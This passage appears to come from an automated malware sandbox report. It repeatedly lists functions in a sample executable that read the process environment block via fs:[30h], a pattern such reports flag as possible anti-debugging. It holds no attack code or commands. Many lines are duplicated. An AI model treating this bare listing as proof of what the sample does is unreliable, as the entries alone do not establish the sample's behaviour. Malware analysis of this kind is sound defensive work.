      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EB5E0 mov eax, dword ptr fs:[00000030h]2_2_341EB5E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EB5E0 mov eax, dword ptr fs:[00000030h]2_2_341EB5E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EB5E0 mov eax, dword ptr fs:[00000030h]2_2_341EB5E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EB5E0 mov eax, dword ptr fs:[00000030h]2_2_341EB5E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421C620 mov eax, dword ptr fs:[00000030h]2_2_3421C620
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428D62C mov ecx, dword ptr fs:[00000030h]2_2_3428D62C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428D62C mov ecx, dword ptr fs:[00000030h]2_2_3428D62C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428D62C mov eax, dword ptr fs:[00000030h]2_2_3428D62C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34268633 mov esi, dword ptr fs:[00000030h]2_2_34268633
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34268633 mov eax, dword ptr fs:[00000030h]2_2_34268633
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34268633 mov eax, dword ptr fs:[00000030h]2_2_34268633
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421F63F mov eax, dword ptr fs:[00000030h]2_2_3421F63F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421F63F mov eax, dword ptr fs:[00000030h]2_2_3421F63F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420D600 mov eax, dword ptr fs:[00000030h]2_2_3420D600
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420D600 mov eax, dword ptr fs:[00000030h]2_2_3420D600
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34269603 mov eax, dword ptr fs:[00000030h]2_2_34269603
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4600 mov eax, dword ptr fs:[00000030h]2_2_342B4600
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F607 mov eax, dword ptr fs:[00000030h]2_2_3429F607
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E0630 mov eax, dword ptr fs:[00000030h]2_2_341E0630
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421360F mov eax, dword ptr fs:[00000030h]2_2_3421360F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34273608 mov eax, dword ptr fs:[00000030h]2_2_34273608
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34273608 mov eax, dword ptr fs:[00000030h]2_2_34273608
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34273608 mov eax, dword ptr fs:[00000030h]2_2_34273608
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34273608 mov eax, dword ptr fs:[00000030h]2_2_34273608
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34273608 mov eax, dword ptr fs:[00000030h]2_2_34273608
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34273608 mov eax, dword ptr fs:[00000030h]2_2_34273608
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E5622 mov eax, dword ptr fs:[00000030h]2_2_341E5622
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E5622 mov eax, dword ptr fs:[00000030h]2_2_341E5622
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E965A mov eax, dword ptr fs:[00000030h]2_2_341E965A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E965A mov eax, dword ptr fs:[00000030h]2_2_341E965A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426E660 mov eax, dword ptr fs:[00000030h]2_2_3426E660
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34275660 mov eax, dword ptr fs:[00000030h]2_2_34275660
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426166E mov eax, dword ptr fs:[00000030h]2_2_3426166E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426166E mov eax, dword ptr fs:[00000030h]2_2_3426166E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426166E mov eax, dword ptr fs:[00000030h]2_2_3426166E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421666D mov esi, dword ptr fs:[00000030h]2_2_3421666D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421666D mov eax, dword ptr fs:[00000030h]2_2_3421666D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421666D mov eax, dword ptr fs:[00000030h]2_2_3421666D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222670 mov eax, dword ptr fs:[00000030h]2_2_34222670
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222670 mov eax, dword ptr fs:[00000030h]2_2_34222670
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DD64A mov eax, dword ptr fs:[00000030h]2_2_341DD64A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DD64A mov eax, dword ptr fs:[00000030h]2_2_341DD64A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E3640 mov eax, dword ptr fs:[00000030h]2_2_341E3640
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FF640 mov eax, dword ptr fs:[00000030h]2_2_341FF640
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FF640 mov eax, dword ptr fs:[00000030h]2_2_341FF640
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FF640 mov eax, dword ptr fs:[00000030h]2_2_341FF640
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421C640 mov eax, dword ptr fs:[00000030h]2_2_3421C640
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421C640 mov eax, dword ptr fs:[00000030h]2_2_3421C640
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E0670 mov eax, dword ptr fs:[00000030h]2_2_341E0670
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34215654 mov eax, dword ptr fs:[00000030h]2_2_34215654
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421265C mov eax, dword ptr fs:[00000030h]2_2_3421265C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421265C mov ecx, dword ptr fs:[00000030h]2_2_3421265C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421265C mov eax, dword ptr fs:[00000030h]2_2_3421265C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F3660 mov eax, dword ptr fs:[00000030h]2_2_341F3660
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F3660 mov eax, dword ptr fs:[00000030h]2_2_341F3660
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F3660 mov eax, dword ptr fs:[00000030h]2_2_341F3660
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D7662 mov eax, dword ptr fs:[00000030h]2_2_341D7662
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D7662 mov eax, dword ptr fs:[00000030h]2_2_341D7662
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D7662 mov eax, dword ptr fs:[00000030h]2_2_341D7662
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A86A8 mov eax, dword ptr fs:[00000030h]2_2_342A86A8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A86A8 mov eax, dword ptr fs:[00000030h]2_2_342A86A8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E8690 mov eax, dword ptr fs:[00000030h]2_2_341E8690
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0680 mov eax, dword ptr fs:[00000030h]2_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F68C mov eax, dword ptr fs:[00000030h]2_2_3429F68C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426C691 mov eax, dword ptr fs:[00000030h]2_2_3426C691
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425D69D mov eax, dword ptr fs:[00000030h]2_2_3425D69D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342066E0 mov eax, dword ptr fs:[00000030h]2_2_342066E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342066E0 mov eax, dword ptr fs:[00000030h]2_2_342066E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342756E0 mov eax, dword ptr fs:[00000030h]2_2_342756E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342756E0 mov eax, dword ptr fs:[00000030h]2_2_342756E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E06CF mov eax, dword ptr fs:[00000030h]2_2_341E06CF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425C6F2 mov eax, dword ptr fs:[00000030h]2_2_3425C6F2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425C6F2 mov eax, dword ptr fs:[00000030h]2_2_3425C6F2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AA6C0 mov eax, dword ptr fs:[00000030h]2_2_342AA6C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342886C2 mov eax, dword ptr fs:[00000030h]2_2_342886C2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420D6D0 mov eax, dword ptr fs:[00000030h]2_2_3420D6D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342766D0 mov eax, dword ptr fs:[00000030h]2_2_342766D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342766D0 mov eax, dword ptr fs:[00000030h]2_2_342766D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D96E0 mov eax, dword ptr fs:[00000030h]2_2_341D96E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D96E0 mov eax, dword ptr fs:[00000030h]2_2_341D96E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EC6E0 mov eax, dword ptr fs:[00000030h]2_2_341EC6E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E56E0 mov eax, dword ptr fs:[00000030h]2_2_341E56E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E56E0 mov eax, dword ptr fs:[00000030h]2_2_341E56E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E56E0 mov eax, dword ptr fs:[00000030h]2_2_341E56E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34209723 mov eax, dword ptr fs:[00000030h]2_2_34209723
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E471B mov eax, dword ptr fs:[00000030h]2_2_341E471B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E471B mov eax, dword ptr fs:[00000030h]2_2_341E471B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED700 mov ecx, dword ptr fs:[00000030h]2_2_341ED700
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A970B mov eax, dword ptr fs:[00000030h]2_2_342A970B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A970B mov eax, dword ptr fs:[00000030h]2_2_342A970B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420270D mov eax, dword ptr fs:[00000030h]2_2_3420270D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420270D mov eax, dword ptr fs:[00000030h]2_2_3420270D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420270D mov eax, dword ptr fs:[00000030h]2_2_3420270D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F717 mov eax, dword ptr fs:[00000030h]2_2_3429F717
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 mov eax, dword ptr fs:[00000030h]2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 mov eax, dword ptr fs:[00000030h]2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 mov eax, dword ptr fs:[00000030h]2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 mov eax, dword ptr fs:[00000030h]2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 mov eax, dword ptr fs:[00000030h]2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 mov eax, dword ptr fs:[00000030h]2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF75B mov eax, dword ptr fs:[00000030h]2_2_341DF75B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34210774 mov eax, dword ptr fs:[00000030h]2_2_34210774
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34213740 mov eax, dword ptr fs:[00000030h]2_2_34213740
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E4779 mov eax, dword ptr fs:[00000030h]2_2_341E4779
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E4779 mov eax, dword ptr fs:[00000030h]2_2_341E4779
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421174A mov eax, dword ptr fs:[00000030h]2_2_3421174A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426174B mov eax, dword ptr fs:[00000030h]2_2_3426174B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426174B mov ecx, dword ptr fs:[00000030h]2_2_3426174B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A750 mov eax, dword ptr fs:[00000030h]2_2_3421A750
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202755 mov eax, dword ptr fs:[00000030h]2_2_34202755
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202755 mov eax, dword ptr fs:[00000030h]2_2_34202755
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202755 mov eax, dword ptr fs:[00000030h]2_2_34202755
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202755 mov ecx, dword ptr fs:[00000030h]2_2_34202755
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202755 mov eax, dword ptr fs:[00000030h]2_2_34202755
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202755 mov eax, dword ptr fs:[00000030h]2_2_34202755
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428E750 mov eax, dword ptr fs:[00000030h]2_2_3428E750
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F2760 mov ecx, dword ptr fs:[00000030h]2_2_341F2760
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AD7A7 mov eax, dword ptr fs:[00000030h]2_2_342AD7A7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AD7A7 mov eax, dword ptr fs:[00000030h]2_2_342AD7A7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AD7A7 mov eax, dword ptr fs:[00000030h]2_2_342AD7A7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B17BC mov eax, dword ptr fs:[00000030h]2_2_342B17BC
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427C7B0 mov eax, dword ptr fs:[00000030h]2_2_3427C7B0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427C7B0 mov eax, dword ptr fs:[00000030h]2_2_3427C7B0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342BB781 mov eax, dword ptr fs:[00000030h]2_2_342BB781
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342BB781 mov eax, dword ptr fs:[00000030h]2_2_342BB781
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34211796 mov eax, dword ptr fs:[00000030h]2_2_34211796
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34211796 mov eax, dword ptr fs:[00000030h]2_2_34211796
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E79D mov eax, dword ptr fs:[00000030h]2_2_3425E79D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E07A7 mov eax, dword ptr fs:[00000030h]2_2_341E07A7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E7E0 mov eax, dword ptr fs:[00000030h]2_2_3420E7E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F7CF mov eax, dword ptr fs:[00000030h]2_2_3429F7CF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E37E4 mov eax, dword ptr fs:[00000030h]2_2_341E37E4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E8009 mov eax, dword ptr fs:[00000030h]2_2_341E8009
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34205004 mov eax, dword ptr fs:[00000030h]2_2_34205004
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34205004 mov ecx, dword ptr fs:[00000030h]2_2_34205004
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DD02D mov eax, dword ptr fs:[00000030h]2_2_341DD02D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222010 mov ecx, dword ptr fs:[00000030h]2_2_34222010
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34289060 mov eax, dword ptr fs:[00000030h]2_2_34289060
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E1051 mov eax, dword ptr fs:[00000030h]2_2_341E1051
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E1051 mov eax, dword ptr fs:[00000030h]2_2_341E1051
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34210044 mov eax, dword ptr fs:[00000030h]2_2_34210044
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34266040 mov eax, dword ptr fs:[00000030h]2_2_34266040
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E6074 mov eax, dword ptr fs:[00000030h]2_2_341E6074
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E6074 mov eax, dword ptr fs:[00000030h]2_2_341E6074
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E7072 mov eax, dword ptr fs:[00000030h]2_2_341E7072
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429B0AF mov eax, dword ptr fs:[00000030h]2_2_3429B0AF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342660A0 mov eax, dword ptr fs:[00000030h]2_2_342660A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342200A5 mov eax, dword ptr fs:[00000030h]2_2_342200A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F0A5 mov eax, dword ptr fs:[00000030h]2_2_3428F0A5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DC090 mov eax, dword ptr fs:[00000030h]2_2_341DC090
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DA093 mov ecx, dword ptr fs:[00000030h]2_2_341DA093
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B50B7 mov eax, dword ptr fs:[00000030h]2_2_342B50B7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B4080 mov eax, dword ptr fs:[00000030h]2_2_342B4080
